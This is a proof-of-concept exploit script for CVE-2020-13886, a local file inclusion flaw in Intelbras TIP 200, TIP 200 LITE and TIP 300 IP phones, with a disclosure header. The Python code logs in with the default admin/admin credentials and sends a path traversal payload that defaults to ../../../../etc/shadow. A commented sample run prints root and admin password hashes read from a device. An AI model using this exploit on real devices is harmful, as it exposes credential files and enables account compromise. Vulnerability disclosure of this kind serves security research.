# Exploit Title: LFI - Intelbras TIP 200 / TIP 200 LITE / TIP 300
# Date: 12/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: intelbras.com
# Version: 60.61.75.15 / 65.61.75.22
# Tested on: 60.61.75.15 / 65.61.75.22
# CVE : CVE-2020-13886



import urllib.parse
import requests as http
import subprocess
import os
from requests.auth import HTTPBasicAuth
def poc():
    print("""                -------------------------------------------------------------------------------------------------------------
                ------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ---------------------------
                ------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT -----------------------------
                -------------------------------------------------------------------------------------------------------------\n""")
    url = input("URL parameter ->")
    payload = input("LFI payload -> ")
    if(payload == ""):
        payload="../../../../etc/shadow"
    urllib.parse.quote(payload)
    r = http.get(str(url)+str(payload), auth=HTTPBasicAuth('admin', 'admin'))
    print(" ")
    text = r.text

    print(text)
poc()


#root@skull:~/home# python p0c.py 
#               -------------------------------------------------------------------------------------------------------------
#               ------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ----------------------------
#               ------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT ------------------------------
#               -------------------------------------------------------------------------------------------------------------


#URL parameter -> http://192.168.0.207/cgi-bin/cgiServer.exx?page=
#LFI payload -> ../../../../etc/shadow
 
#root:$1$83hUAZ/2$GKlGOZlepa6eikA6mfG1l/:11876:0:99999:7:::
#admin:DP7Kg4tE0Y9rs:11876:0:99999:7:::